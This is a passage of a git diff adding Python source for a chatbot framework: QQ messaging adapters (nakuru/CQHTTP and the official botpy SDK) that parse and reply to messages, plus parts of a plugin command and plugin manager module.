@@ -0,0 +1,310 @@
|
||||
import time, asyncio, traceback
|
||||
|
||||
from nakuru.entities.components import Plain, At, Image, Node, BaseMessageComponent
|
||||
from nakuru import (
|
||||
CQHTTP,
|
||||
GuildMessage,
|
||||
GroupMessage,
|
||||
FriendMessage,
|
||||
GroupMemberIncrease,
|
||||
MessageItemType
|
||||
)
|
||||
from typing import Union, List, Dict
|
||||
from type.types import Context
|
||||
from . import Platform
|
||||
from type.astrbot_message import *
|
||||
from type.message_event import *
|
||||
from type.command import *
|
||||
from SparkleLogging.utils.core import LogManager
|
||||
from logging import Logger
|
||||
from astrbot.message.handler import MessageHandler
|
||||
from util.cmd_config import PlatformConfig, NakuruPlatformConfig
|
||||
|
||||
logger: Logger = LogManager.GetLogger(log_name='astrbot')
|
||||
|
||||
|
||||
class FakeSource:
|
||||
def __init__(self, type, group_id):
|
||||
self.type = type
|
||||
self.group_id = group_id
|
||||
|
||||
|
||||
class QQNakuru(Platform):
|
||||
def __init__(self, context: Context,
|
||||
message_handler: MessageHandler,
|
||||
platform_config: PlatformConfig) -> None:
|
||||
super().__init__("nakuru", context)
|
||||
assert isinstance(platform_config, NakuruPlatformConfig), "gocq: 无法识别的配置类型。"
|
||||
|
||||
self.loop = asyncio.new_event_loop()
|
||||
asyncio.set_event_loop(self.loop)
|
||||
|
||||
self.message_handler = message_handler
|
||||
self.waiting = {}
|
||||
self.context = context
|
||||
self.unique_session = context.config_helper.platform_settings.unique_session
|
||||
self.config = platform_config
|
||||
self.admins = context.config_helper.admins_id
|
||||
|
||||
self.client = CQHTTP(
|
||||
host=self.config.host,
|
||||
port=self.config.websocket_port,
|
||||
http_port=self.config.port
|
||||
)
|
||||
gocq_app = self.client
|
||||
|
||||
@gocq_app.receiver("GroupMessage")
|
||||
async def _(app: CQHTTP, source: GroupMessage):
|
||||
if self.config.enable_group:
|
||||
abm = self.convert_message(source)
|
||||
await self.handle_msg(abm)
|
||||
|
||||
@gocq_app.receiver("FriendMessage")
|
||||
async def _(app: CQHTTP, source: FriendMessage):
|
||||
if self.config.enable_direct_message:
|
||||
abm = self.convert_message(source)
|
||||
await self.handle_msg(abm)
|
||||
|
||||
@gocq_app.receiver("GuildMessage")
|
||||
async def _(app: CQHTTP, source: GuildMessage):
|
||||
if self.config.enable_guild:
|
||||
abm = self.convert_message(source)
|
||||
await self.handle_msg(abm)
|
||||
|
||||
def pre_check(self, message: AstrBotMessage) -> bool:
|
||||
# if message chain contains Plain components or At components which points to self_id, return True
|
||||
if message.type == MessageType.FRIEND_MESSAGE:
|
||||
return True, "friend"
|
||||
for comp in message.message:
|
||||
if isinstance(comp, At) and str(comp.qq) == message.self_id:
|
||||
return True, "at"
|
||||
# check commands which ignore prefix
|
||||
if self.context.command_manager.check_command_ignore_prefix(message.message_str):
|
||||
return True, "command"
|
||||
# check nicks
|
||||
if self.check_nick(message.message_str):
|
||||
return True, "nick"
|
||||
return False, "none"
|
||||
|
||||
def run(self):
|
||||
coro = self.client._run()
|
||||
return coro
|
||||
|
||||
async def handle_msg(self, message: AstrBotMessage):
|
||||
logger.info(
|
||||
f"{message.sender.nickname}/{message.sender.user_id} -> {self.parse_message_outline(message)}")
|
||||
|
||||
assert isinstance(message.raw_message,
|
||||
(GroupMessage, FriendMessage, GuildMessage))
|
||||
|
||||
# 判断是否响应消息
|
||||
ok, reason = self.pre_check(message)
|
||||
if not ok:
|
||||
return
|
||||
|
||||
# 解析 session_id
|
||||
if self.unique_session or message.type == MessageType.FRIEND_MESSAGE:
|
||||
session_id = message.raw_message.user_id
|
||||
elif message.type == MessageType.GROUP_MESSAGE:
|
||||
session_id = message.raw_message.group_id
|
||||
elif message.type == MessageType.GUILD_MESSAGE:
|
||||
session_id = message.raw_message.channel_id
|
||||
else:
|
||||
session_id = message.raw_message.user_id
|
||||
|
||||
message.session_id = session_id
|
||||
|
||||
# 解析 role
|
||||
sender_id = str(message.raw_message.user_id)
|
||||
if sender_id in self.admins:
|
||||
role = 'admin'
|
||||
else:
|
||||
role = 'member'
|
||||
|
||||
# parse unified message origin
|
||||
unified_msg_origin = None
|
||||
if message.type == MessageType.GROUP_MESSAGE:
|
||||
assert isinstance(message.raw_message, GroupMessage)
|
||||
unified_msg_origin = f"nakuru:{message.type.value}:{message.raw_message.group_id}"
|
||||
elif message.type == MessageType.FRIEND_MESSAGE:
|
||||
assert isinstance(message.raw_message, FriendMessage)
|
||||
unified_msg_origin = f"nakuru:{message.type.value}:{message.sender.user_id}"
|
||||
elif message.type == MessageType.GUILD_MESSAGE:
|
||||
assert isinstance(message.raw_message, GuildMessage)
|
||||
unified_msg_origin = f"nakuru:{message.type.value}:{message.raw_message.channel_id}"
|
||||
|
||||
logger.debug(f"unified_msg_origin: {unified_msg_origin}")
|
||||
|
||||
|
||||
# construct astrbot message event
|
||||
ame = AstrMessageEvent.from_astrbot_message(message,
|
||||
self.context,
|
||||
"nakuru",
|
||||
session_id,
|
||||
role,
|
||||
unified_msg_origin,
|
||||
reason == 'command') # only_command
|
||||
|
||||
# transfer control to message handler
|
||||
message_result = await self.message_handler.handle(ame)
|
||||
if not message_result: return
|
||||
|
||||
await self.reply_msg(message, message_result.result_message, message_result.use_t2i)
|
||||
if message_result.callback:
|
||||
message_result.callback()
|
||||
|
||||
# 如果是等待回复的消息
|
||||
if session_id in self.waiting and self.waiting[session_id] == '':
|
||||
self.waiting[session_id] = message
|
||||
|
||||
async def reply_msg(self,
|
||||
message: AstrBotMessage,
|
||||
result_message: List[BaseMessageComponent],
|
||||
use_t2i: bool = None):
|
||||
"""
|
||||
回复用户唤醒机器人的消息。(被动回复)
|
||||
"""
|
||||
source = message.raw_message
|
||||
res = result_message
|
||||
|
||||
assert isinstance(source,
|
||||
(GroupMessage, FriendMessage, GuildMessage))
|
||||
|
||||
logger.info(
|
||||
f"{source.user_id} <- {self.parse_message_outline(res)}")
|
||||
|
||||
if isinstance(res, str):
|
||||
res = [Plain(text=res), ]
|
||||
|
||||
# if image mode, put all Plain texts into a new picture.
|
||||
if use_t2i or (use_t2i == None and self.context.config_helper.t2i) and isinstance(result_message, list):
|
||||
rendered_images = await self.convert_to_t2i_chain(res)
|
||||
if rendered_images:
|
||||
try:
|
||||
await self._reply(source, rendered_images)
|
||||
return
|
||||
except BaseException as e:
|
||||
logger.warn(traceback.format_exc())
|
||||
logger.warn(f"以文本转图片的形式回复消息时发生错误: {e},将尝试默认方式。")
|
||||
|
||||
await self._reply(source, res)
|
||||
|
||||
async def _reply(self, source, message_chain: List[BaseMessageComponent]):
|
||||
await self.record_metrics()
|
||||
if isinstance(message_chain, str):
|
||||
message_chain = [Plain(text=message_chain), ]
|
||||
|
||||
is_dict = isinstance(source, dict)
|
||||
|
||||
typ = None
|
||||
if is_dict:
|
||||
if "group_id" in source:
|
||||
typ = "GroupMessage"
|
||||
elif "user_id" in source:
|
||||
typ = "FriendMessage"
|
||||
elif "guild_id" in source:
|
||||
typ = "GuildMessage"
|
||||
else:
|
||||
typ = source.type
|
||||
|
||||
if typ == "GuildMessage":
|
||||
guild_id = source['guild_id'] if is_dict else source.guild_id
|
||||
chan_id = source['channel_id'] if is_dict else source.channel_id
|
||||
await self.client.sendGuildChannelMessage(guild_id, chan_id, message_chain)
|
||||
elif typ == "FriendMessage":
|
||||
user_id = source['user_id'] if is_dict else source.user_id
|
||||
await self.client.sendFriendMessage(user_id, message_chain)
|
||||
elif typ == "GroupMessage":
|
||||
group_id = source['group_id'] if is_dict else source.group_id
|
||||
# 过长时forward发送
|
||||
plain_text_len = 0
|
||||
image_num = 0
|
||||
for i in message_chain:
|
||||
if isinstance(i, Plain):
|
||||
plain_text_len += len(i.text)
|
||||
elif isinstance(i, Image):
|
||||
image_num += 1
|
||||
if plain_text_len > self.context.config_helper.platform_settings.forward_threshold or image_num > 1:
|
||||
# 删除At
|
||||
for i in message_chain:
|
||||
if isinstance(i, At):
|
||||
message_chain.remove(i)
|
||||
node = Node(message_chain)
|
||||
node.uin = 123456
|
||||
node.name = f"bot"
|
||||
node.time = int(time.time())
|
||||
nodes = [node]
|
||||
await self.client.sendGroupForwardMessage(group_id, nodes)
|
||||
return
|
||||
await self.client.sendGroupMessage(group_id, message_chain)
|
||||
|
||||
async def send_msg(self, target: Dict[str, int], result_message: CommandResult):
|
||||
'''
|
||||
以主动的方式给用户、群或者频道发送一条消息。
|
||||
|
||||
`target` 接收一个 dict 类型的值引用。
|
||||
|
||||
- 要发给 QQ 下的某个用户,请添加 key `user_id`,值为 int 类型的 qq 号;
|
||||
- 要发给某个群聊,请添加 key `group_id`,值为 int 类型的 qq 群号;
|
||||
- 要发给某个频道,请添加 key `guild_id`, `channel_id`。均为 int 类型。
|
||||
|
||||
guild_id 不是频道号。
|
||||
'''
|
||||
await self._reply(target, result_message.message_chain)
|
||||
|
||||
async def send_msg_new(self, message_type: MessageType, target: str, result_message: CommandResult):
|
||||
'''
|
||||
以主动的方式给用户、群或者频道发送一条消息。
|
||||
|
||||
`message_type` 为 MessageType 枚举类型。
|
||||
|
||||
- 要发给 QQ 下的某个用户,请使用 MessageType.FRIEND_MESSAGE;
|
||||
- 要发给某个群聊,请使用 MessageType.GROUP_MESSAGE;
|
||||
- 要发给某个频道,请使用 MessageType.GUILD_MESSAGE。
|
||||
'''
|
||||
if message_type == MessageType.FRIEND_MESSAGE:
|
||||
await self.send_msg({"user_id": int(target)}, result_message)
|
||||
elif message_type == MessageType.GROUP_MESSAGE:
|
||||
await self.send_msg({"group_id": int(target)}, result_message)
|
||||
elif message_type == MessageType.GUILD_MESSAGE:
|
||||
await self.send_msg({"channel_id": int(target)}, result_message)
|
||||
|
||||
def convert_message(self, message: Union[GroupMessage, FriendMessage, GuildMessage]) -> AstrBotMessage:
|
||||
abm = AstrBotMessage()
|
||||
abm.type = MessageType(message.type)
|
||||
abm.raw_message = message
|
||||
abm.message_id = message.message_id
|
||||
|
||||
plain_content = ""
|
||||
for i in message.message:
|
||||
if isinstance(i, Plain):
|
||||
plain_content += i.text
|
||||
abm.message_str = plain_content.strip()
|
||||
if message.type == MessageItemType.GuildMessage:
|
||||
abm.self_id = str(message.self_tiny_id)
|
||||
else:
|
||||
abm.self_id = str(message.self_id)
|
||||
abm.sender = MessageMember(
|
||||
str(message.sender.user_id),
|
||||
str(message.sender.nickname)
|
||||
)
|
||||
abm.tag = "nakuru"
|
||||
abm.message = message.message
|
||||
return abm
|
||||
|
||||
def wait_for_message(self, group_id) -> Union[GroupMessage, FriendMessage, GuildMessage]:
|
||||
'''
|
||||
等待下一条消息,超时 300s 后抛出异常
|
||||
'''
|
||||
self.waiting[group_id] = ''
|
||||
cnt = 0
|
||||
while True:
|
||||
if group_id in self.waiting and self.waiting[group_id] != '':
|
||||
# 去掉
|
||||
ret = self.waiting[group_id]
|
||||
del self.waiting[group_id]
|
||||
return ret
|
||||
cnt += 1
|
||||
if cnt > 300:
|
||||
raise Exception("等待消息超时。")
|
||||
time.sleep(1)
|
||||
405
model/platform/qq_official.py
Normal file
@@ -0,0 +1,405 @@
|
||||
import botpy
|
||||
import re
|
||||
import time
|
||||
import traceback
|
||||
import asyncio
|
||||
import botpy.message
|
||||
import botpy.types
|
||||
import botpy.types.message
|
||||
|
||||
from botpy.types.message import Reference, Media
|
||||
from botpy import Client
|
||||
from util.io import save_temp_img, download_image_by_url
|
||||
from . import Platform
|
||||
from type.astrbot_message import *
|
||||
from type.message_event import *
|
||||
from type.command import *
|
||||
from typing import Union, List, Dict
|
||||
from nakuru.entities.components import *
|
||||
from SparkleLogging.utils.core import LogManager
|
||||
from logging import Logger
|
||||
from astrbot.message.handler import MessageHandler
|
||||
from util.cmd_config import PlatformConfig, QQOfficialPlatformConfig
|
||||
|
||||
logger: Logger = LogManager.GetLogger(log_name='astrbot')
|
||||
|
||||
# QQ 机器人官方框架
|
||||
class botClient(Client):
|
||||
def set_platform(self, platform: 'QQOfficial'):
|
||||
self.platform = platform
|
||||
|
||||
# 收到群消息
|
||||
async def on_group_at_message_create(self, message: botpy.message.GroupMessage):
|
||||
abm = self.platform._parse_from_qqofficial(message, MessageType.GROUP_MESSAGE)
|
||||
await self.platform.handle_msg(abm)
|
||||
|
||||
# 收到频道消息
|
||||
async def on_at_message_create(self, message: botpy.message.Message):
|
||||
# 转换层
|
||||
abm = self.platform._parse_from_qqofficial(message, MessageType.GUILD_MESSAGE)
|
||||
await self.platform.handle_msg(abm)
|
||||
|
||||
# 收到私聊消息
|
||||
async def on_direct_message_create(self, message: botpy.message.DirectMessage):
|
||||
# 转换层
|
||||
abm = self.platform._parse_from_qqofficial(message, MessageType.FRIEND_MESSAGE)
|
||||
await self.platform.handle_msg(abm)
|
||||
|
||||
# 收到 C2C 消息
|
||||
async def on_c2c_message_create(self, message: botpy.message.C2CMessage):
|
||||
abm = self.platform._parse_from_qqofficial(message, MessageType.FRIEND_MESSAGE)
|
||||
await self.platform.handle_msg(abm)
|
||||
|
||||
|
||||
class QQOfficial(Platform):
|
||||
|
||||
def __init__(self, context: Context,
|
||||
message_handler: MessageHandler,
|
||||
platform_config: PlatformConfig,
|
||||
test_mode = False) -> None:
|
||||
super().__init__("qqofficial", context)
|
||||
assert isinstance(platform_config, QQOfficialPlatformConfig), "qq_official: 无法识别的配置类型。"
|
||||
self.loop = asyncio.new_event_loop()
|
||||
asyncio.set_event_loop(self.loop)
|
||||
|
||||
self.message_handler = message_handler
|
||||
self.waiting: dict = {}
|
||||
self.context = context
|
||||
self.config = platform_config
|
||||
self.admins = context.config_helper.admins_id
|
||||
|
||||
self.appid = platform_config.appid
|
||||
self.secret = platform_config.secret
|
||||
self.unique_session = context.config_helper.platform_settings.unique_session
|
||||
qq_group = platform_config.enable_group_c2c
|
||||
guild_dm = platform_config.enable_guild_direct_message
|
||||
|
||||
if qq_group:
|
||||
self.intents = botpy.Intents(
|
||||
public_messages=True,
|
||||
public_guild_messages=True,
|
||||
direct_message=guild_dm
|
||||
)
|
||||
else:
|
||||
self.intents = botpy.Intents(
|
||||
public_guild_messages=True,
|
||||
direct_message=guild_dm
|
||||
)
|
||||
self.client = botClient(
|
||||
intents=self.intents,
|
||||
bot_log=False,
|
||||
timeout=20,
|
||||
)
|
||||
|
||||
self.client.set_platform(self)
|
||||
|
||||
self.test_mode = os.environ.get('TEST_MODE', 'off') == 'on'
|
||||
|
||||
async def _parse_to_qqofficial(self, message: List[BaseMessageComponent], is_group: bool = False):
|
||||
plain_text = ""
|
||||
image_path = None # only one img supported
|
||||
for i in message:
|
||||
if isinstance(i, Plain):
|
||||
plain_text += i.text
|
||||
elif isinstance(i, Image) and not image_path:
|
||||
if i.path:
|
||||
image_path = i.path
|
||||
elif i.file and i.file.startswith("base64://"):
|
||||
img_data = base64.b64decode(i.file[9:])
|
||||
image_path = save_temp_img(img_data)
|
||||
elif i.file and i.file.startswith("http"):
|
||||
# 如果是群消息,不需要下载
|
||||
image_path = await download_image_by_url(i.file) if not is_group else i.file
|
||||
return plain_text, image_path
|
||||
|
||||
def _parse_from_qqofficial(self, message: Union[botpy.message.Message, botpy.message.GroupMessage],
|
||||
message_type: MessageType):
|
||||
abm = AstrBotMessage()
|
||||
abm.type = message_type
|
||||
abm.timestamp = int(time.time())
|
||||
abm.raw_message = message
|
||||
abm.message_id = message.id
|
||||
abm.tag = "qqofficial"
|
||||
msg: List[BaseMessageComponent] = []
|
||||
|
||||
if isinstance(message, botpy.message.GroupMessage) or isinstance(message, botpy.message.C2CMessage):
|
||||
if isinstance(message, botpy.message.GroupMessage):
|
||||
abm.sender = MessageMember(
|
||||
message.author.member_openid,
|
||||
""
|
||||
)
|
||||
else:
|
||||
abm.sender = MessageMember(
|
||||
message.author.user_openid,
|
||||
""
|
||||
)
|
||||
abm.message_str = message.content.strip()
|
||||
abm.self_id = "unknown_selfid"
|
||||
|
||||
msg.append(Plain(abm.message_str))
|
||||
if message.attachments:
|
||||
for i in message.attachments:
|
||||
if i.content_type.startswith("image"):
|
||||
url = i.url
|
||||
if not url.startswith("http"):
|
||||
url = "https://"+url
|
||||
img = Image.fromURL(url)
|
||||
msg.append(img)
|
||||
abm.message = msg
|
||||
|
||||
elif isinstance(message, botpy.message.Message) or isinstance(message, botpy.message.DirectMessage):
|
||||
try:
|
||||
abm.self_id = str(message.mentions[0].id)
|
||||
except:
|
||||
abm.self_id = ""
|
||||
|
||||
plain_content = message.content.replace(
|
||||
"<@!"+str(abm.self_id)+">", "").strip()
|
||||
msg.append(Plain(plain_content))
|
||||
if message.attachments:
|
||||
for i in message.attachments:
|
||||
if i.content_type.startswith("image"):
|
||||
url = i.url
|
||||
if not url.startswith("http"):
|
||||
url = "https://"+url
|
||||
img = Image.fromURL(url)
|
||||
msg.append(img)
|
||||
abm.message = msg
|
||||
abm.message_str = plain_content
|
||||
abm.sender = MessageMember(
|
||||
str(message.author.id),
|
||||
str(message.author.username)
|
||||
)
|
||||
else:
|
||||
raise ValueError(f"Unknown message type: {message_type}")
|
||||
return abm
|
||||
|
||||
def run(self):
|
||||
return self.client.start(
|
||||
appid=self.appid,
|
||||
secret=self.secret
|
||||
)
|
||||
|
||||
async def handle_msg(self, message: AstrBotMessage):
|
||||
assert isinstance(message.raw_message, (botpy.message.Message,
|
||||
botpy.message.GroupMessage, botpy.message.DirectMessage, botpy.message.C2CMessage))
|
||||
is_group = message.type != MessageType.FRIEND_MESSAGE
|
||||
|
||||
_t = "/私聊" if not is_group else ""
|
||||
logger.info(
|
||||
f"{message.sender.nickname}({message.sender.user_id}{_t}) -> {self.parse_message_outline(message)}")
|
||||
|
||||
# 解析出 session_id
|
||||
if self.unique_session or not is_group:
|
||||
session_id = message.sender.user_id
|
||||
else:
|
||||
if message.type == MessageType.GUILD_MESSAGE:
|
||||
session_id = message.raw_message.channel_id
|
||||
elif message.type == MessageType.GROUP_MESSAGE:
|
||||
session_id = str(message.raw_message.group_openid)
|
||||
else:
|
||||
session_id = str(message.raw_message.author.id)
|
||||
message.session_id = session_id
|
||||
|
||||
# 解析出 role
|
||||
sender_id = message.sender.user_id
|
||||
if sender_id in self.admins:
|
||||
role = 'admin'
|
||||
else:
|
||||
role = 'member'
|
||||
|
||||
# construct astrbot message event
|
||||
ame = AstrMessageEvent.from_astrbot_message(message, self.context, "qqofficial", session_id, role)
|
||||
|
||||
message_result = await self.message_handler.handle(ame)
|
||||
if not message_result:
|
||||
return
|
||||
|
||||
ret = await self.reply_msg(message, message_result.result_message, message_result.use_t2i)
|
||||
if message_result.callback:
|
||||
message_result.callback()
|
||||
|
||||
# 如果是等待回复的消息
|
||||
if session_id in self.waiting and self.waiting[session_id] == '':
|
||||
self.waiting[session_id] = message
|
||||
|
||||
return ret
|
||||
|
||||
async def reply_msg(self,
|
||||
message: AstrBotMessage,
|
||||
result_message: List[BaseMessageComponent],
|
||||
use_t2i: bool = None):
|
||||
'''
|
||||
回复频道消息
|
||||
'''
|
||||
source = message.raw_message
|
||||
assert isinstance(source, (botpy.message.Message,
|
||||
botpy.message.GroupMessage, botpy.message.DirectMessage, botpy.message.C2CMessage))
|
||||
logger.info(
|
||||
f"{message.sender.nickname}({message.sender.user_id}) <- {self.parse_message_outline(result_message)}")
|
||||
|
||||
plain_text = ''
|
||||
image_path = ''
|
||||
msg_ref = None
|
||||
rendered_images = []
|
||||
|
||||
if use_t2i or (use_t2i == None and self.context.config_helper.t2i) and isinstance(result_message, list):
|
||||
rendered_images = await self.convert_to_t2i_chain(result_message)
|
||||
|
||||
if isinstance(result_message, list):
|
||||
plain_text, image_path = await self._parse_to_qqofficial(result_message, message.type == MessageType.GROUP_MESSAGE)
|
||||
else:
|
||||
plain_text = result_message
|
||||
|
||||
if source and not image_path: # file_image与message_reference不能同时传入
|
||||
msg_ref = Reference(message_id=source.id,
|
||||
ignore_get_message_error=False)
|
||||
|
||||
# 到这里,我们得到了 plain_text,image_path,msg_ref
|
||||
data = {
|
||||
'content': plain_text,
|
||||
'msg_id': message.message_id,
|
||||
'message_reference': msg_ref
|
||||
}
|
||||
|
||||
if isinstance(message.raw_message, botpy.message.GroupMessage):
|
||||
data['group_openid'] = str(source.group_openid)
|
||||
elif isinstance(message.raw_message, botpy.message.Message):
|
||||
data['channel_id'] = source.channel_id
|
||||
elif isinstance(message.raw_message, botpy.message.DirectMessage):
|
||||
data['guild_id'] = source.guild_id
|
||||
elif isinstance(message.raw_message, botpy.message.C2CMessage):
|
||||
data['openid'] = source.author.user_openid
|
||||
if image_path:
|
||||
data['file_image'] = image_path
|
||||
if rendered_images:
|
||||
# 文转图
|
||||
_data = data.copy()
|
||||
_data['content'] = ''
|
||||
_data['file_image'] = rendered_images[0].file
|
||||
_data['message_reference'] = None
|
||||
|
||||
try:
|
||||
return await self._reply(**_data)
|
||||
except BaseException as e:
|
||||
logger.warn(traceback.format_exc())
|
||||
logger.warn(f"以文本转图片的形式回复消息时发生错误: {e},将尝试默认方式。")
|
||||
|
||||
try:
|
||||
return await self._reply(**data)
|
||||
except BaseException as e:
|
||||
logger.error(traceback.format_exc())
|
||||
# 分割过长的消息
|
||||
if "msg over length" in str(e):
|
||||
split_res = []
|
||||
split_res.append(plain_text[:len(plain_text)//2])
|
||||
split_res.append(plain_text[len(plain_text)//2:])
|
||||
for i in split_res:
|
||||
data['content'] = i
|
||||
return await self._reply(**data)
|
||||
else:
|
||||
try:
|
||||
# 防止被qq频道过滤消息
|
||||
plain_text = plain_text.replace(".", " . ")
|
||||
return await self._reply(**data)
|
||||
except BaseException as e:
|
||||
try:
|
||||
data['content'] = str.join(" ", plain_text)
|
||||
return await self._reply(**data)
|
||||
except BaseException as e:
|
||||
plain_text = re.sub(
|
||||
r'(https|http)?:\/\/(\w|\.|\/|\?|\=|\&|\%)*\b', '[被隐藏的链接]', str(e), flags=re.MULTILINE)
|
||||
plain_text = plain_text.replace(".", "·")
|
||||
data['content'] = plain_text
|
||||
return await self._reply(**data)
|
||||
|
||||
async def _reply(self, **kwargs):
|
||||
await self.record_metrics()
|
||||
if 'group_openid' in kwargs or 'openid' in kwargs:
|
||||
# QQ群组消息
|
||||
if 'file_image' in kwargs and kwargs['file_image']:
|
||||
file_image_path = kwargs['file_image'].replace("file:///", "")
|
||||
if file_image_path:
|
||||
|
||||
if file_image_path.startswith("http"):
|
||||
image_url = file_image_path
|
||||
else:
|
||||
logger.debug(f"上传图片: {file_image_path}")
|
||||
image_url = await self.context.image_uploader.upload_image(file_image_path)
|
||||
logger.debug(f"上传成功: {image_url}")
|
||||
if 'group_openid' in kwargs:
|
||||
media = await self.client.api.post_group_file(kwargs['group_openid'], 1, image_url)
|
||||
elif 'openid' in kwargs:
|
||||
media = await self.client.api.post_c2c_file(kwargs['openid'], 1, image_url)
|
||||
del kwargs['file_image']
|
||||
kwargs['media'] = media
|
||||
logger.debug(f"发送群图片: {media}")
|
||||
kwargs['msg_type'] = 7 # 富媒体
|
||||
if self.test_mode:
|
||||
return kwargs
|
||||
if 'group_openid' in kwargs:
|
||||
await self.client.api.post_group_message(**kwargs)
|
||||
elif 'openid' in kwargs:
|
||||
await self.client.api.post_c2c_message(**kwargs)
|
||||
elif 'channel_id' in kwargs:
|
||||
# 频道消息
|
||||
if 'file_image' in kwargs and kwargs['file_image']:
|
||||
kwargs['file_image'] = kwargs['file_image'].replace("file:///", "")
|
||||
# 频道消息发图只支持本地
|
||||
if kwargs['file_image'].startswith("http"):
|
||||
kwargs['file_image'] = await download_image_by_url(kwargs['file_image'])
|
||||
if self.test_mode:
|
||||
return kwargs
|
||||
await self.client.api.post_message(**kwargs)
|
||||
elif 'guild_id' in kwargs:
|
||||
# 频道私聊消息
|
||||
if 'file_image' in kwargs and kwargs['file_image']:
|
||||
kwargs['file_image'] = kwargs['file_image'].replace("file:///", "")
|
||||
if kwargs['file_image'].startswith("http"):
|
||||
kwargs['file_image'] = await download_image_by_url(kwargs['file_image'])
|
||||
if self.test_mode:
|
||||
return kwargs
|
||||
await self.client.api.post_dms(**kwargs)
|
||||
else:
|
||||
raise ValueError("Unknown target type.")
|
||||
|
||||
async def send_msg(self, target: Dict[str, str], result_message: CommandResult):
|
||||
'''
|
||||
以主动的方式给频道用户、群、频道或者消息列表用户(QQ用户)发送一条消息。
|
||||
|
||||
`target` 接收一个 dict 类型的值引用。
|
||||
|
||||
- 如果目标是 QQ 群,请添加 key `group_openid`。
|
||||
- 如果目标是 频道消息,请添加 key `channel_id`。
|
||||
- 如果目标是 频道私聊,请添加 key `guild_id`。
|
||||
- 如果目标是 QQ 用户,请添加 key `openid`。
|
||||
'''
|
||||
plain_text, image_path = await self._parse_to_qqofficial(result_message.message_chain)
|
||||
|
||||
payload = {
|
||||
'content': plain_text,
|
||||
**target
|
||||
}
|
||||
if image_path:
|
||||
payload['file_image'] = image_path
|
||||
await self._reply(**payload)
|
||||
|
||||
async def send_msg_new(self, message_type: MessageType, target: str, result_message: CommandResult):
|
||||
raise NotImplementedError("qqofficial 不支持此方法。")
|
||||
|
||||
def wait_for_message(self, channel_id: int) -> AstrBotMessage:
|
||||
'''
|
||||
等待指定 channel_id 的下一条信息,超时 300s 后抛出异常
|
||||
'''
|
||||
self.waiting[channel_id] = ''
|
||||
cnt = 0
|
||||
while True:
|
||||
if channel_id in self.waiting and self.waiting[channel_id] != '':
|
||||
# 去掉
|
||||
ret = self.waiting[channel_id]
|
||||
del self.waiting[channel_id]
|
||||
return ret
|
||||
cnt += 1
|
||||
if cnt > 300:
|
||||
raise Exception("等待消息超时。")
|
||||
time.sleep(1)
|
||||
26
model/plugin/command.py
Normal file
@@ -0,0 +1,26 @@
|
||||
from dataclasses import dataclass
|
||||
from type.register import RegisteredPlugins
|
||||
from typing import List, Union, Callable
|
||||
from SparkleLogging.utils.core import LogManager
|
||||
from logging import Logger
|
||||
|
||||
logger: Logger = LogManager.GetLogger(log_name='astrbot')
|
||||
|
||||
|
||||
@dataclass
|
||||
class CommandRegisterRequest():
|
||||
command_name: str
|
||||
description: str
|
||||
priority: int
|
||||
handler: Callable
|
||||
use_regex: bool = False
|
||||
plugin_name: str = None
|
||||
ignore_prefix: bool = False
|
||||
|
||||
class PluginCommandBridge():
|
||||
def __init__(self, cached_plugins: RegisteredPlugins):
|
||||
self.plugin_commands_waitlist: List[CommandRegisterRequest] = []
|
||||
self.cached_plugins = cached_plugins
|
||||
|
||||
def register_command(self, plugin_name, command_name, description, priority, handler, use_regex=False, ignore_prefix=False):
|
||||
self.plugin_commands_waitlist.append(CommandRegisterRequest(command_name, description, priority, handler, use_regex, plugin_name, ignore_prefix))
|
||||
286
model/plugin/manager.py
Normal file
@@ -0,0 +1,286 @@
|
||||
import inspect
|
||||
import os
|
||||
import sys
|
||||
import traceback
|
||||
import uuid
|
||||
import shutil
|
||||
import yaml
|
||||
import subprocess
|
||||
|
||||
from util.updator.plugin_updator import PluginUpdator
|
||||
from util.io import remove_dir, download_file
|
||||
from types import ModuleType
|
||||
from type.types import Context
|
||||
from type.plugin import *
|
||||
from type.register import *
|
||||
from SparkleLogging.utils.core import LogManager
|
||||
from logging import Logger
|
||||
|
||||
logger: Logger = LogManager.GetLogger(log_name='astrbot')
|
||||
|
||||
class PluginManager():
|
||||
def __init__(self, context: Context):
|
||||
self.updator = PluginUpdator()
|
||||
self.plugin_store_path = self.updator.get_plugin_store_path()
|
||||
self.context = context
|
||||
|
||||
def get_classes(self, arg: ModuleType):
|
||||
classes = []
|
||||
clsmembers = inspect.getmembers(arg, inspect.isclass)
|
||||
for (name, _) in clsmembers:
|
||||
if name.lower().endswith("plugin") or name.lower() == "main":
|
||||
classes.append(name)
|
||||
break
|
||||
return classes
|
||||
|
||||
def get_modules(self, path):
|
||||
modules = []
|
||||
|
||||
dirs = os.listdir(path)
|
||||
# 遍历文件夹,找到 main.py 或者和文件夹同名的文件
|
||||
for d in dirs:
|
||||
if os.path.isdir(os.path.join(path, d)):
|
||||
if os.path.exists(os.path.join(path, d, "main.py")):
|
||||
module_str = 'main'
|
||||
elif os.path.exists(os.path.join(path, d, d + ".py")):
|
||||
module_str = d
|
||||
else:
|
||||
print(f"插件 {d} 未找到 main.py 或者 {d}.py,跳过。")
|
||||
continue
|
||||
if os.path.exists(os.path.join(path, d, "main.py")) or os.path.exists(os.path.join(path, d, d + ".py")):
|
||||
modules.append({
|
||||
"pname": d,
|
||||
"module": module_str,
|
||||
"module_path": os.path.join(path, d, module_str)
|
||||
})
|
||||
return modules
|
||||
|
||||
def get_plugin_modules(self):
|
||||
plugins = []
|
||||
try:
|
||||
plugin_dir = self.plugin_store_path
|
||||
if os.path.exists(plugin_dir):
|
||||
plugins = self.get_modules(plugin_dir)
|
||||
return plugins
|
||||
except BaseException as e:
|
||||
raise e
|
||||
|
||||
def check_plugin_dept_update(self, target_plugin: str = None):
|
||||
plugin_dir = self.plugin_store_path
|
||||
if not os.path.exists(plugin_dir):
|
||||
return False
|
||||
to_update = []
|
||||
if target_plugin:
|
||||
to_update.append(target_plugin)
|
||||
else:
|
||||
for p in self.context.cached_plugins:
|
||||
to_update.append(p.root_dir_name)
|
||||
for p in to_update:
|
||||
plugin_path = os.path.join(plugin_dir, p)
|
||||
if os.path.exists(os.path.join(plugin_path, "requirements.txt")):
|
||||
pth = os.path.join(plugin_path, "requirements.txt")
|
||||
logger.info(f"正在检查更新插件 {p} 的依赖: {pth}")
|
||||
self.update_plugin_dept(os.path.join(plugin_path, "requirements.txt"))
|
||||
|
||||
def update_plugin_dept(self, path):
|
||||
mirror = "https://mirrors.aliyun.com/pypi/simple/"
|
||||
py = sys.executable
|
||||
# os.system(f"{py} -m pip install -r {path} -i {mirror} --break-system-package --trusted-host mirrors.aliyun.com")
|
||||
|
||||
